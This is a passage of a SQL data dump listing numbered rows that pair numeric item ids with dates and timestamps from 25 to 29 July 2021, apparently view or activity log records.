21:07:07'),(28891,1598,1,'2021-07-25','2021-07-25 21:27:17'),(28892,3781,1,'2021-07-25','2021-07-25 21:58:01'),(28893,2150,1,'2021-07-25','2021-07-25 22:05:26'),(28894,468,1,'2021-07-25','2021-07-25 22:30:29'),(28895,2159,1,'2021-07-25','2021-07-25 23:05:23'),(28896,1726,1,'2021-07-25','2021-07-25 23:35:24'),(28897,2159,1,'2021-07-26','2021-07-26 00:05:25'),(28898,2769,1,'2021-07-26','2021-07-26 00:47:39'),(28899,80,1,'2021-07-26','2021-07-26 00:49:10'),(28900,3117,1,'2021-07-26','2021-07-26 02:17:25'),(28901,89,1,'2021-07-26','2021-07-26 04:13:37'),(28902,2457,1,'2021-07-26','2021-07-26 04:20:27'),(28903,472,1,'2021-07-26','2021-07-26 04:40:26'),(28904,80,1,'2021-07-26','2021-07-26 04:50:30'),(28905,1600,1,'2021-07-26','2021-07-26 05:22:10'),(28906,1594,1,'2021-07-26','2021-07-26 06:00:27'),(28907,1598,1,'2021-07-26','2021-07-26 06:18:44'),(28908,1604,1,'2021-07-26','2021-07-26 06:20:27'),(28909,3280,1,'2021-07-26','2021-07-26 06:28:46'),(28910,1602,1,'2021-07-26','2021-07-26 06:30:28'),(28911,468,1,'2021-07-26','2021-07-26 06:40:28'),(28912,1872,1,'2021-07-26','2021-07-26 06:50:24'),(28913,570,1,'2021-07-26','2021-07-26 07:00:26'),(28914,470,1,'2021-07-26','2021-07-26 07:08:07'),(28915,1582,1,'2021-07-26','2021-07-26 07:10:26'),(28916,3777,1,'2021-07-26','2021-07-26 07:20:27'),(28917,2309,1,'2021-07-26','2021-07-26 07:49:02'),(28918,1592,1,'2021-07-26','2021-07-26 07:51:08'),(28919,1877,1,'2021-07-26','2021-07-26 08:00:38'),(28920,2457,1,'2021-07-26','2021-07-26 08:05:10'),(28921,3781,1,'2021-07-26','2021-07-26 08:09:49'),(28922,3781,1,'2021-07-26','2021-07-26 08:09:55'),(28923,3251,1,'2021-07-26','2021-07-26 08:12:00'),(28924,1602,1,'2021-07-26','2021-07-26 08:19:49'),(28925,335,1,'2021-07-26','2021-07-26 08:20:28'),(28926,3034,1,'2021-07-26','2021-07-26 08:40:26'),(28927,1594,1,'2021-07-26','2021-07-26 09:02:49'),(28928,2309,1,'2021-07-26','2021-07-26 09:19:23'),(28929,1588,1,'2021-07-26','2021-07-26 10:19:36'),(28930,2159,1,'2021-07-26','2021-07-26 10:22:29'),(28931,1602,1,'2021-07-26','2021-07-26 10:45:34'),(28932,80,1,'2021-07-26','2021-07-26 10:45:40'),(28933,76,1,'2021-07-26','2021-07-26 10:46:58'),(28934,80,1,'2021-07-26','2021-07-26 10:47:13'),(28935,1726,1,'2021-07-26','2021-07-26 10:52:28'),(28936,1600,1,'2021-07-26','2021-07-26 10:59:22'),(28937,3060,1,'2021-07-26','2021-07-26 11:10:27'),(28938,2150,1,'2021-07-26','2021-07-26 11:22:28'),(28939,3257,1,'2021-07-26','2021-07-26 11:40:25'),(28940,2813,1,'2021-07-26','2021-07-26 11:50:14'),(28941,486,1,'2021-07-26','2021-07-26 11:52:28'),(28942,2609,1,'2021-07-26','2021-07-26 12:10:25'),(28943,3030,1,'2021-07-26','2021-07-26 12:30:41'),(28944,1588,1,'2021-07-26','2021-07-26 12:31:27'),(28945,3307,1,'2021-07-26','2021-07-26 13:50:42'),(28946,469,1,'2021-07-26','2021-07-26 14:26:56'),(28947,1592,1,'2021-07-26','2021-07-26 14:33:14'),(28948,470,1,'2021-07-26','2021-07-26 14:53:10'),(28949,1604,1,'2021-07-26','2021-07-26 15:03:19'),(28950,2419,1,'2021-07-26','2021-07-26 15:20:44'),(28951,1872,1,'2021-07-26','2021-07-26 15:33:15'),(28952,1598,1,'2021-07-26','2021-07-26 15:48:20'),(28953,3069,1,'2021-07-26','2021-07-26 16:01:05'),(28954,2457,1,'2021-07-26','2021-07-26 16:10:28'),(28955,1606,1,'2021-07-26','2021-07-26 16:28:31'),(28956,1602,1,'2021-07-26','2021-07-26 16:29:29'),(28957,1610,1,'2021-07-26','2021-07-26 16:34:53'),(28958,3063,1,'2021-07-26','2021-07-26 16:40:26'),(28959,472,1,'2021-07-26','2021-07-26 16:55:26'),(28960,2769,1,'2021-07-26','2021-07-26 17:04:27'),(28961,1586,1,'2021-07-26','2021-07-26 17:10:29'),(28962,1701,1,'2021-07-26','2021-07-26 17:25:26'),(28963,1604,1,'2021-07-26','2021-07-26 17:35:17'),(28964,570,1,'2021-07-26','2021-07-26 17:40:27'),(28965,2309,1,'2021-07-26','2021-07-26 17:48:21'),(28966,80,1,'2021-07-26','2021-07-26 17:50:25'),(28967,1592,1,'2021-07-26','2021-07-26 17:55:27'),(28968,80,1,'2021-07-26','2021-07-26 18:23:30'),(28969,1877,1,'2021-07-26','2021-07-26 18:30:43'),(28970,1604,1,'2021-07-26','2021-07-26 18:40:30'),(28971,1606,1,'2021-07-26','2021-07-26 18:44:17'),(28972,1586,1,'2021-07-26','2021-07-26 18:50:33'),(28973,1600,1,'2021-07-26','2021-07-26 18:57:43'),(28974,1872,1,'2021-07-26','2021-07-26 19:00:27'),(28975,1606,1,'2021-07-26','2021-07-26 19:09:56'),(28976,2309,1,'2021-07-26','2021-07-26 19:28:36'),(28977,3063,1,'2021-07-26','2021-07-26 19:30:27'),(28978,570,1,'2021-07-26','2021-07-26 19:40:47'),(28979,89,1,'2021-07-26','2021-07-26 20:26:36'),(28980,1588,1,'2021-07-26','2021-07-26 20:44:11'),(28981,1598,1,'2021-07-26','2021-07-26 21:40:52'),(28982,2609,1,'2021-07-26','2021-07-26 22:03:31'),(28983,1594,1,'2021-07-26','2021-07-26 22:13:06'),(28984,2993,1,'2021-07-26','2021-07-26 22:13:59'),(28985,1594,1,'2021-07-26','2021-07-26 22:40:31'),(28986,468,1,'2021-07-26','2021-07-26 22:40:41'),(28987,1594,1,'2021-07-26','2021-07-26 22:44:01'),(28988,3251,1,'2021-07-26','2021-07-26 23:03:20'),(28989,3705,1,'2021-07-26','2021-07-26 23:26:21'),(28990,1594,1,'2021-07-26','2021-07-26 23:27:05'),(28991,1594,1,'2021-07-26','2021-07-26 23:27:06'),(28992,1594,1,'2021-07-26','2021-07-26 23:27:57'),(28993,1594,1,'2021-07-27','2021-07-27 00:13:05'),(28994,1594,1,'2021-07-27','2021-07-27 00:13:05'),(28995,3178,1,'2021-07-27','2021-07-27 00:14:20'),(28996,2558,1,'2021-07-27','2021-07-27 00:55:31'),(28997,91,1,'2021-07-27','2021-07-27 00:56:06'),(28998,3285,1,'2021-07-27','2021-07-27 00:58:40'),(28999,474,1,'2021-07-27','2021-07-27 01:29:24'),(29000,1582,1,'2021-07-27','2021-07-27 02:01:44'),(29001,1751,1,'2021-07-27','2021-07-27 02:23:36'),(29002,1586,1,'2021-07-27','2021-07-27 03:00:28'),(29003,1602,1,'2021-07-27','2021-07-27 04:00:26'),(29004,1602,1,'2021-07-27','2021-07-27 05:00:25'),(29005,1602,1,'2021-07-27','2021-07-27 05:40:30'),(29006,1592,1,'2021-07-27','2021-07-27 06:00:26'),(29007,1594,1,'2021-07-27','2021-07-27 06:17:43'),(29008,2704,1,'2021-07-27','2021-07-27 06:19:34'),(29009,1594,1,'2021-07-27','2021-07-27 06:19:46'),(29010,3096,1,'2021-07-27','2021-07-27 06:35:16'),(29011,3097,1,'2021-07-27','2021-07-27 06:40:26'),(29012,3251,1,'2021-07-27','2021-07-27 07:00:25'),(29013,1592,1,'2021-07-27','2021-07-27 07:20:54'),(29014,1600,1,'2021-07-27','2021-07-27 07:33:17'),(29015,1610,1,'2021-07-27','2021-07-27 08:11:04'),(29016,1877,1,'2021-07-27','2021-07-27 08:11:21'),(29017,1594,1,'2021-07-27','2021-07-27 08:17:41'),(29018,72,1,'2021-07-27','2021-07-27 08:29:38'),(29019,1600,1,'2021-07-27','2021-07-27 08:40:28'),(29020,1582,1,'2021-07-27','2021-07-27 09:21:53'),(29021,80,1,'2021-07-27','2021-07-27 09:37:42'),(29022,2609,1,'2021-07-27','2021-07-27 09:40:27'),(29023,80,1,'2021-07-27','2021-07-27 09:44:09'),(29024,2904,1,'2021-07-27','2021-07-27 09:47:57'),(29025,1602,1,'2021-07-27','2021-07-27 10:52:39'),(29026,3777,1,'2021-07-27','2021-07-27 10:53:36'),(29027,91,1,'2021-07-27','2021-07-27 10:54:11'),(29028,80,1,'2021-07-27','2021-07-27 10:54:30'),(29029,76,1,'2021-07-27','2021-07-27 10:55:32'),(29030,1602,1,'2021-07-27','2021-07-27 10:56:03'),(29031,1596,1,'2021-07-27','2021-07-27 11:06:09'),(29032,68,1,'2021-07-27','2021-07-27 11:07:59'),(29033,1596,1,'2021-07-27','2021-07-27 11:09:42'),(29034,1596,1,'2021-07-27','2021-07-27 11:09:55'),(29035,87,1,'2021-07-27','2021-07-27 11:12:14'),(29036,2148,1,'2021-07-27','2021-07-27 11:17:29'),(29037,2159,1,'2021-07-27','2021-07-27 11:40:40'),(29038,1602,1,'2021-07-27','2021-07-27 11:43:45'),(29039,89,1,'2021-07-27','2021-07-27 11:44:04'),(29040,2297,1,'2021-07-27','2021-07-27 11:47:37'),(29041,1582,1,'2021-07-27','2021-07-27 11:53:46'),(29042,89,1,'2021-07-27','2021-07-27 12:06:55'),(29043,84,1,'2021-07-27','2021-07-27 12:10:36'),(29044,1602,1,'2021-07-27','2021-07-27 12:23:21'),(29045,3290,1,'2021-07-27','2021-07-27 12:53:22'),(29046,2309,1,'2021-07-27','2021-07-27 13:26:56'),(29047,2148,1,'2021-07-27','2021-07-27 13:28:20'),(29048,3777,1,'2021-07-27','2021-07-27 13:40:26'),(29049,1602,1,'2021-07-27','2021-07-27 14:10:59'),(29050,1612,1,'2021-07-27','2021-07-27 14:30:11'),(29051,1602,1,'2021-07-27','2021-07-27 15:24:46'),(29052,1588,1,'2021-07-27','2021-07-27 16:00:06'),(29053,1588,1,'2021-07-27','2021-07-27 16:01:16'),(29054,1600,1,'2021-07-27','2021-07-27 17:44:19'),(29055,1600,1,'2021-07-27','2021-07-27 17:51:26'),(29056,91,1,'2021-07-27','2021-07-27 18:16:54'),(29057,3675,1,'2021-07-27','2021-07-27 18:21:36'),(29058,2309,1,'2021-07-27','2021-07-27 18:38:15'),(29059,570,1,'2021-07-27','2021-07-27 18:51:26'),(29060,2309,1,'2021-07-27','2021-07-27 19:15:42'),(29061,3060,1,'2021-07-27','2021-07-27 19:41:21'),(29062,1722,1,'2021-07-27','2021-07-27 20:08:23'),(29063,2309,1,'2021-07-27','2021-07-27 20:23:25'),(29064,1582,1,'2021-07-27','2021-07-27 20:23:58'),(29065,2309,1,'2021-07-27','2021-07-27 20:28:44'),(29066,2309,1,'2021-07-27','2021-07-27 20:31:12'),(29067,3710,1,'2021-07-27','2021-07-27 20:33:22'),(29068,2309,1,'2021-07-27','2021-07-27 20:34:40'),(29069,3034,1,'2021-07-27','2021-07-27 20:43:20'),(29070,1602,1,'2021-07-27','2021-07-27 21:00:26'),(29071,482,1,'2021-07-27','2021-07-27 21:08:49'),(29072,1582,1,'2021-07-27','2021-07-27 21:27:19'),(29073,3178,1,'2021-07-27','2021-07-27 21:29:09'),(29074,1594,1,'2021-07-27','2021-07-27 21:40:26'),(29075,1722,1,'2021-07-27','2021-07-27 21:49:26'),(29076,1751,1,'2021-07-27','2021-07-27 21:59:27'),(29077,1592,1,'2021-07-27','2021-07-27 22:00:27'),(29078,2993,1,'2021-07-27','2021-07-27 22:19:27'),(29079,472,1,'2021-07-27','2021-07-27 22:20:26'),(29080,2309,1,'2021-07-27','2021-07-27 22:49:27'),(29081,1877,1,'2021-07-27','2021-07-27 22:50:25'),(29082,1588,1,'2021-07-27','2021-07-27 22:59:28'),(29083,1612,1,'2021-07-27','2021-07-27 23:20:24'),(29084,1770,1,'2021-07-27','2021-07-27 23:29:35'),(29085,3251,1,'2021-07-27','2021-07-27 23:50:27'),(29086,76,1,'2021-07-28','2021-07-28 00:15:09'),(29087,2457,1,'2021-07-28','2021-07-28 00:20:27'),(29088,2457,1,'2021-07-28','2021-07-28 00:50:29'),(29089,2309,1,'2021-07-28','2021-07-28 00:51:15'),(29090,2813,1,'2021-07-28','2021-07-28 01:01:17'),(29091,1602,1,'2021-07-28','2021-07-28 01:03:30'),(29092,1598,1,'2021-07-28','2021-07-28 01:11:21'),(29093,2769,1,'2021-07-28','2021-07-28 01:23:54'),(29094,3109,1,'2021-07-28','2021-07-28 01:31:38'),(29095,3069,1,'2021-07-28','2021-07-28 02:01:22'),(29096,2769,1,'2021-07-28','2021-07-28 02:11:11'),(29097,3307,1,'2021-07-28','2021-07-28 02:21:11'),(29098,1588,1,'2021-07-28','2021-07-28 02:31:22'),(29099,1588,1,'2021-07-28','2021-07-28 02:36:09'),(29100,1718,1,'2021-07-28','2021-07-28 02:41:25'),(29101,1596,1,'2021-07-28','2021-07-28 02:51:42'),(29102,3313,1,'2021-07-28','2021-07-28 03:22:13'),(29103,1598,1,'2021-07-28','2021-07-28 03:32:21'),(29104,1614,1,'2021-07-28','2021-07-28 03:52:11'),(29105,3313,1,'2021-07-28','2021-07-28 04:02:24'),(29106,3005,1,'2021-07-28','2021-07-28 04:12:12'),(29107,2751,1,'2021-07-28','2021-07-28 04:32:02'),(29108,89,1,'2021-07-28','2021-07-28 04:55:39'),(29109,3316,1,'2021-07-28','2021-07-28 05:12:19'),(29110,1718,1,'2021-07-28','2021-07-28 05:42:06'),(29111,3498,1,'2021-07-28','2021-07-28 05:52:05'),(29112,3099,1,'2021-07-28','2021-07-28 06:02:12'),(29113,1586,1,'2021-07-28','2021-07-28 06:24:38'),(29114,2558,1,'2021-07-28','2021-07-28 06:32:33'),(29115,2911,1,'2021-07-28','2021-07-28 06:42:49'),(29116,469,1,'2021-07-28','2021-07-28 06:52:43'),(29117,1596,1,'2021-07-28','2021-07-28 07:12:33'),(29118,2309,1,'2021-07-28','2021-07-28 07:22:33'),(29119,1594,1,'2021-07-28','2021-07-28 07:32:30'),(29120,1588,1,'2021-07-28','2021-07-28 07:32:33'),(29121,3307,1,'2021-07-28','2021-07-28 07:53:08'),(29122,3674,1,'2021-07-28','2021-07-28 08:02:50'),(29123,3675,1,'2021-07-28','2021-07-28 08:17:29'),(29124,3674,1,'2021-07-28','2021-07-28 08:23:03'),(29125,469,1,'2021-07-28','2021-07-28 08:26:33'),(29126,1877,1,'2021-07-28','2021-07-28 08:32:31'),(29127,1770,1,'2021-07-28','2021-07-28 08:36:23'),(29128,1586,1,'2021-07-28','2021-07-28 09:02:32'),(29129,1745,1,'2021-07-28','2021-07-28 09:26:33'),(29130,3060,1,'2021-07-28','2021-07-28 09:32:32'),(29131,1600,1,'2021-07-28','2021-07-28 09:47:30'),(29132,3251,1,'2021-07-28','2021-07-28 10:02:30'),(29133,91,1,'2021-07-28','2021-07-28 10:13:52'),(29134,91,1,'2021-07-28','2021-07-28 10:14:45'),(29135,87,1,'2021-07-28','2021-07-28 10:16:04'),(29136,89,1,'2021-07-28','2021-07-28 10:16:28'),(29137,84,1,'2021-07-28','2021-07-28 10:16:42'),(29138,68,1,'2021-07-28','2021-07-28 10:16:54'),(29139,76,1,'2021-07-28','2021-07-28 10:16:58'),(29140,1598,1,'2021-07-28','2021-07-28 10:17:18'),(29141,72,1,'2021-07-28','2021-07-28 10:17:22'),(29142,80,1,'2021-07-28','2021-07-28 10:17:34'),(29143,87,1,'2021-07-28','2021-07-28 10:18:40'),(29144,2309,1,'2021-07-28','2021-07-28 10:25:52'),(29145,3777,1,'2021-07-28','2021-07-28 10:32:30'),(29146,2769,1,'2021-07-28','2021-07-28 10:37:12'),(29147,3069,1,'2021-07-28','2021-07-28 10:47:02'),(29148,2813,1,'2021-07-28','2021-07-28 11:16:50'),(29149,3127,1,'2021-07-28','2021-07-28 11:26:49'),(29150,1600,1,'2021-07-28','2021-07-28 11:32:29'),(29151,1588,1,'2021-07-28','2021-07-28 11:36:50'),(29152,1594,1,'2021-07-28','2021-07-28 11:51:33'),(29153,3307,1,'2021-07-28','2021-07-28 12:07:01'),(29154,1600,1,'2021-07-28','2021-07-28 12:14:45'),(29155,1718,1,'2021-07-28','2021-07-28 12:17:10'),(29156,1598,1,'2021-07-28','2021-07-28 12:46:51'),(29157,1594,1,'2021-07-28','2021-07-28 12:53:01'),(29158,89,1,'2021-07-28','2021-07-28 13:04:23'),(29159,3313,1,'2021-07-28','2021-07-28 13:16:43'),(29160,2148,1,'2021-07-28','2021-07-28 13:21:42'),(29161,89,1,'2021-07-28','2021-07-28 13:25:33'),(29162,2911,1,'2021-07-28','2021-07-28 13:26:32'),(29163,2813,1,'2021-07-28','2021-07-28 14:07:16'),(29164,89,1,'2021-07-28','2021-07-28 14:13:20'),(29165,2751,1,'2021-07-28','2021-07-28 14:17:01'),(29166,3313,1,'2021-07-28','2021-07-28 14:28:04'),(29167,3287,1,'2021-07-28','2021-07-28 14:37:11'),(29168,1596,1,'2021-07-28','2021-07-28 14:39:53'),(29169,1596,1,'2021-07-28','2021-07-28 14:42:48'),(29170,1608,1,'2021-07-28','2021-07-28 14:52:45'),(29171,80,1,'2021-07-28','2021-07-28 14:54:48'),(29172,1608,1,'2021-07-28','2021-07-28 14:56:32'),(29173,3069,1,'2021-07-28','2021-07-28 14:57:21'),(29174,2769,1,'2021-07-28','2021-07-28 15:14:54'),(29175,3243,1,'2021-07-28','2021-07-28 15:17:11'),(29176,1734,1,'2021-07-28','2021-07-28 15:20:10'),(29177,2617,1,'2021-07-28','2021-07-28 15:37:04'),(29178,2769,1,'2021-07-28','2021-07-28 15:44:22'),(29179,1612,1,'2021-07-28','2021-07-28 15:44:53'),(29180,80,1,'2021-07-28','2021-07-28 15:47:07'),(29181,1614,1,'2021-07-28','2021-07-28 16:02:40'),(29182,2309,1,'2021-07-28','2021-07-28 16:17:20'),(29183,2911,1,'2021-07-28','2021-07-28 16:27:31'),(29184,1877,1,'2021-07-28','2021-07-28 16:32:37'),(29185,1588,1,'2021-07-28','2021-07-28 16:49:19'),(29186,469,1,'2021-07-28','2021-07-28 17:07:30'),(29187,3307,1,'2021-07-28','2021-07-28 17:27:51'),(29188,1770,1,'2021-07-28','2021-07-28 17:48:04'),(29189,2297,1,'2021-07-28','2021-07-28 17:50:40'),(29190,3674,1,'2021-07-28','2021-07-28 18:08:08'),(29191,1596,1,'2021-07-28','2021-07-28 18:31:26'),(29192,1586,1,'2021-07-28','2021-07-28 18:32:38'),(29193,3498,1,'2021-07-28','2021-07-28 18:47:34'),(29194,1774,1,'2021-07-28','2021-07-28 18:47:58'),(29195,2309,1,'2021-07-28','2021-07-28 19:18:25'),(29196,2769,1,'2021-07-28','2021-07-28 19:28:15'),(29197,2309,1,'2021-07-28','2021-07-28 19:37:55'),(29198,3498,1,'2021-07-28','2021-07-28 19:38:03'),(29199,1718,1,'2021-07-28','2021-07-28 19:48:12'),(29200,1588,1,'2021-07-28','2021-07-28 19:57:54'),(29201,89,1,'2021-07-28','2021-07-28 20:03:32'),(29202,2769,1,'2021-07-28','2021-07-28 20:29:05'),(29203,2813,1,'2021-07-28','2021-07-28 20:38:56'),(29204,1594,1,'2021-07-28','2021-07-28 20:42:54'),(29205,3060,1,'2021-07-28','2021-07-28 20:45:29'),(29206,1728,1,'2021-07-28','2021-07-28 20:49:05'),(29207,1718,1,'2021-07-28','2021-07-28 21:18:57'),(29208,1606,1,'2021-07-28','2021-07-28 21:18:59'),(29209,1582,1,'2021-07-28','2021-07-28 21:34:58'),(29210,1614,1,'2021-07-28','2021-07-28 21:43:20'),(29211,1594,1,'2021-07-28','2021-07-28 21:47:11'),(29212,474,1,'2021-07-28','2021-07-28 21:47:36'),(29213,1598,1,'2021-07-28','2021-07-28 21:59:08'),(29214,2751,1,'2021-07-28','2021-07-28 22:08:52'),(29215,1594,1,'2021-07-28','2021-07-28 22:08:53'),(29216,470,1,'2021-07-28','2021-07-28 22:19:03'),(29217,3107,1,'2021-07-28','2021-07-28 22:29:03'),(29218,3083,1,'2021-07-28','2021-07-28 22:39:09'),(29219,1600,1,'2021-07-28','2021-07-28 22:42:53'),(29220,2609,1,'2021-07-28','2021-07-28 22:45:35'),(29221,3438,1,'2021-07-28','2021-07-28 22:49:06'),(29222,80,1,'2021-07-28','2021-07-28 23:03:16'),(29223,80,1,'2021-07-28','2021-07-28 23:04:56'),(29224,2813,1,'2021-07-28','2021-07-28 23:09:02'),(29225,3127,1,'2021-07-28','2021-07-28 23:29:57'),(29226,1600,1,'2021-07-28','2021-07-28 23:38:16'),(29227,1872,1,'2021-07-28','2021-07-28 23:42:55'),(29228,3243,1,'2021-07-29','2021-07-29 00:09:32'),(29229,2165,1,'2021-07-29','2021-07-29 00:19:57'),(29230,2809,1,'2021-07-29','2021-07-29 00:29:21'),(29231,1709,1,'2021-07-29','2021-07-29 00:29:48'),(29232,2751,1,'2021-07-29','2021-07-29 00:39:32'),(29233,1782,1,'2021-07-29','2021-07-29 00:49:39'),(29234,2309,1,'2021-07-29','2021-07-29 00:59:51'),(29235,1588,1,'2021-07-29','2021-07-29 01:11:25'),(29236,2911,1,'2021-07-29','2021-07-29 01:19:44'),(29237,1720,1,'2021-07-29','2021-07-29 01:29:14'),(29238,1730,1,'2021-07-29','2021-07-29 01:30:17'),(29239,89,1,'2021-07-29','2021-07-29 01:40:16'),(29240,3109,1,'2021-07-29','2021-07-29 01:49:50'),(29241,3307,1,'2021-07-29','2021-07-29 02:09:49'),(29242,469,1,'2021-07-29','2021-07-29 02:21:01'),(29243,3534,1,'2021-07-29','2021-07-29 02:40:52'),(29244,1602,1,'2021-07-29','2021-07-29 02:42:54'),(29245,1720,1,'2021-07-29','2021-07-29 02:49:56'),(29246,2911,1,'2021-07-29','2021-07-29 02:51:18'),(29247,1594,1,'2021-07-29','2021-07-29 02:52:32'),(29248,91,1,'2021-07-29','2021-07-29 02:53:11'),(29249,91,1,'2021-07-29','2021-07-29 02:53:29'),(29250,1594,1,'2021-07-29','2021-07-29 02:53:32'),(29251,1770,1,'2021-07-29','2021-07-29 03:11:21'),(29252,3674,1,'2021-07-29','2021-07-29 03:21:11'),(29253,3498,1,'2021-07-29','2021-07-29 03:31:12'),(29254,1594,1,'2021-07-29','2021-07-29 03:46:27'),(29255,1602,1,'2021-07-29','2021-07-29 03:51:07'),(29256,1596,1,'2021-07-29','2021-07-29 03:51:20'),(29257,87,1,'2021-07-29','2021-07-29 03:51:30'),(29258,1594,1,'2021-07-29','2021-07-29 03:51:47'),(29259,1598,1,'2021-07-29','2021-07-29 04:11:14'),(29260,89,1,'2021-07-29','2021-07-29 04:12:54'),(29261,108,1,'2021-07-29','2021-07-29 04:21:20'),(29262,2769,1,'2021-07-29','2021-07-29 04:24:37'),(29263,1606,1,'2021-07-29','2021-07-29 04:30:12'),(29264,3285,1,'2021-07-29','2021-07-29 04:41:29'),(29265,2769,1,'2021-07-29','2021-07-29 04:51:39'),(29266,2813,1,'2021-07-29','2021-07-29 05:12:07'),(29267,1594,1,'2021-07-29','2021-07-29 05:12:54'),(29268,3069,1,'2021-07-29','2021-07-29 05:24:27'),(29269,1602,1,'2021-07-29','2021-07-29 05:31:34'),(29270,1718,1,'2021-07-29','2021-07-29 05:31:53'),(29271,472,1,'2021-07-29','2021-07-29 05:34:08'),(29272,1602,1,'2021-07-29','2021-07-29 05:44:26'),(29273,3691,1,'2021-07-29','2021-07-29 05:52:05'),(29274,3307,1,'2021-07-29','2021-07-29 06:11:49'),(29275,3764,1,'2021-07-29','2021-07-29 06:12:57'),(29276,1596,1,'2021-07-29','2021-07-29 06:21:56'),(29277,482,1,'2021-07-29','2021-07-29 06:26:28'),(29278,68,1,'2021-07-29','2021-07-29 06:27:02'),(29279,1718,1,'2021-07-29','2021-07-29 06:31:39'),(29280,3691,1,'2021-07-29','2021-07-29 06:41:32'),(29281,2419,1,'2021-07-29','2021-07-29 06:51:40'),(29282,3541,1,'2021-07-29','2021-07-29 07:12:03'),(29283,3489,1,'2021-07-29','2021-07-29 07:12:53'),(29284,1606,1,'2021-07-29','2021-07-29 07:33:29'),(29285,1745,1,'2021-07-29','2021-07-29 07:42:01'),(29286,3438,1,'2021-07-29','2021-07-29 08:02:00'),(29287,2813,1,'2021-07-29','2021-07-29 08:12:10'),(29288,3127,1,'2021-07-29','2021-07-29 08:22:22'),(29289,3313,1,'2021-07-29','2021-07-29 08:31:07'),(29290,3069,1,'2021-07-29','2021-07-29 09:01:14'),(29291,469,1,'2021-07-29','2021-07-29 09:11:20'),(29292,3099,1,'2021-07-29','2021-07-29 09:21:29'),(29293,1770,1,'2021-07-29','2021-07-29 09:31:42'),(29294,3781,1,'2021-07-29','2021-07-29 09:41:30'),(29295,89,1,'2021-07-29','2021-07-29 09:59:48'),(29296,89,1,'2021-07-29','2021-07-29 10:05:19'),(29297,1596,1,'2021-07-29','2021-07-29 10:05:33'),(29298,1596,1,'2021-07-29','2021-07-29 10:05:39'),(29299,89,1,'2021-07-29','2021-07-29 10:05:56'),(29300,1596,1,'2021-07-29','2021-07-29 10:06:22'),(29301,89,1,'2021-07-29','2021-07-29 10:06:32'),(29302,1592,1,'2021-07-29','2021-07-29 10:07:19'),(29303,89,1,'2021-07-29','2021-07-29 10:07:44'),(29304,1590,1,'2021-07-29','2021-07-29 10:07:48'),(29305,1590,1,'2021-07-29','2021-07-29 10:07:53'),(29306,89,1,'2021-07-29','2021-07-29 10:08:00'),(29307,1604,1,'2021-07-29','2021-07-29 10:08:21'),(29308,1604,1,'2021-07-29','2021-07-29 10:08:25'),(29309,89,1,'2021-07-29','2021-07-29 10:08:31'),(29310,1606,1,'2021-07-29','2021-07-29 10:08:34'),(29311,2457,1,'2021-07-29','2021-07-29 10:08:59'),(29312,89,1,'2021-07-29','2021-07-29 10:09:42'),(29313,1610,1,'2021-07-29','2021-07-29 10:09:48'),(29314,2558,1,'2021-07-29','2021-07-29 10:11:51'),(29315,3005,1,'2021-07-29','2021-07-29 10:22:05'),(29316,89,1,'2021-07-29','2021-07-29 10:31:05'),(29317,3041,1,'2021-07-29','2021-07-29 10:31:12'),(29318,89,1,'2021-07-29','2021-07-29 10:31:29'),(29319,2964,1,'2021-07-29','2021-07-29 10:31:32'),(29320,2558,1,'2021-07-29','2021-07-29 10:32:02'),(29321,1586,1,'2021-07-29','2021-07-29 11:01:36'),(29322,2178,1,'2021-07-29','2021-07-29 11:11:51'),(29323,80,1,'2021-07-29','2021-07-29 11:14:41'),(29324,474,1,'2021-07-29','2021-07-29 11:23:47'),(29325,3175,1,'2021-07-29','2021-07-29 11:31:42'),(29326,1608,1,'2021-07-29','2021-07-29 11:45:03'),(29327,469,1,'2021-07-29','2021-07-29 11:52:04'),(29328,2704,1,'2021-07-29','2021-07-29 11:53:48'),(29329,3674,1,'2021-07-29','2021-07-29 12:12:21'),(29330,3175,1,'2021-07-29','2021-07-29 12:22:10'),(29331,1872,1,'2021-07-29','2021-07-29 12:23:48'),(29332,2457,1,'2021-07-29','2021-07-29 12:24:52'),(29333,470,1,'2021-07-29','2021-07-29 12:32:41'),(29334,2751,1,'2021-07-29','2021-07-29 12:52:41'),(29335,2775,1,'2021-07-29','2021-07-29 12:53:47'),(29336,2804,1,'2021-07-29','2021-07-29 13:02:51'),(29337,2309,1,'2021-07-29','2021-07-29 13:13:04'),(29338,1598,1,'2021-07-29','2021-07-29 13:33:02'),(29339,2769,1,'2021-07-29','2021-07-29 13:43:06'),(29340,3489,1,'2021-07-29','2021-07-29 13:53:49'),(29341,1598,1,'2021-07-29','2021-07-29 13:53:52'),(29342,1588,1,'2021-07-29','2021-07-29 13:55:50'),(29343,76,1,'2021-07-29','2021-07-29 13:56:24'),(29344,2769,1,'2021-07-29','2021-07-29 14:02:50'),(29345,1602,1,'2021-07-29','2021-07-29 14:06:17'),(29346,1588,1,'2021-07-29','2021-07-29 14:12:40'),(29347,3541,1,'2021-07-29','2021-07-29 14:14:13'),(29348,2813,1,'2021-07-29','2021-07-29 14:22:39'),(29349,3069,1,'2021-07-29','2021-07-29 14:32:50'),(29350,1718,1,'2021-07-29','2021-07-29 14:42:52'),(29351,3764,1,'2021-07-29','2021-07-29 14:42:54'),(29352,1596,1,'2021-07-29','2021-07-29 14:53:01'),(29353,80,1,'2021-07-29','2021-07-29 14:59:00'),(29354,80,1,'2021-07-29','2021-07-29 15:00:32'),(29355,80,1,'2021-07-29','2021-07-29 15:00:41'),(29356,2609,1,'2021-07-29','2021-07-29 15:05:32'),(29357,3307,1,'2021-07-29','2021-07-29 15:13:22'),(29358,3287,1,'2021-07-29','2021-07-29 15:42:58'),(29359,1602,1,'2021-07-29','2021-07-29 15:44:12'),(29360,3175,1,'2021-07-29','2021-07-29 16:29:54'),(29361,1608,1,'2021-07-29','2021-07-29 16:56:09'),(29362,1594,1,'2021-07-29','2021-07-29 17:51:57'),(29363,3030,1,'2021-07-29','2021-07-29 17:58:02'),(29364,80,1,'2021-07-29','2021-07-29 18:01:07'),(29365,1606,1,'2021-07-29','2021-07-29 18:14:20'),(29366,91,1,'2021-07-29','2021-07-29 18:15:33'),(29367,1606,1,'2021-07-29','2021-07-29 18:16:29'),(29368,2658,1,'2021-07-29','2021-07-29 18:47:15'),(29369,89,1,'2021-07-29','2021-07-29 18:58:42'),(29370,1614,1,'2021-07-29','2021-07-29 18:59:27'),(29371,2159,1,'2021-07-29','2021-07-29 19:23:27'),(29372,2309,1,'2021-07-29','2021-07-29 19:25:36'),(29373,1602,1,'2021-07-29','2021-07-29 20:09:21'),(29374,1602,1,'2021-07-29','2021-07-29 20:09:24'),(29375,1602,1,'2021-07-29','2021-07-29 20:09:25'),(29376,2309,1,'2021-07-29','2021-07-29 21:07:54'),(29377,570,1,'2021-07-29','2021-07-29 